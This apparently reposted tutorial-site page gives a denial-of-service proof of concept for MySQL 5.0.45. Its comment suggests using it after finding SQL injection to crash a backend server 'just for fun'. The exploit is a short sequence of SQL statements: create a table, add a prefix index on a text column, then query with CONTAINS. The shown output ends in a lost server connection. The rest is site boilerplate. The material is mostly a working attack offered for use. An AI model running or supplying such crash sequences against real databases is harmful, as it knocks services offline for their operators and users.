Home >Database >Mysql Tutorial >mysql 5.0.45 （修改）拒绝服务漏洞_MySQL

mysql 5.0.45 （修改）拒绝服务漏洞_MySQL

WBOYOriginal: 2016-06-01 13:20:23968browse

bitsCN.com mysql 5.0.45 （修改）拒绝服务漏洞
/*
* MySQL * Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
bitsCN.com

Statement：

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Previous article：Can't connect to MySQL server的解决办法_MySQLNext article：MySQL错误“Specified key was too long; max key length is 100_MySQL

See more

mysql 5.0.45 （修改）拒绝服务漏洞_MySQL

Related articles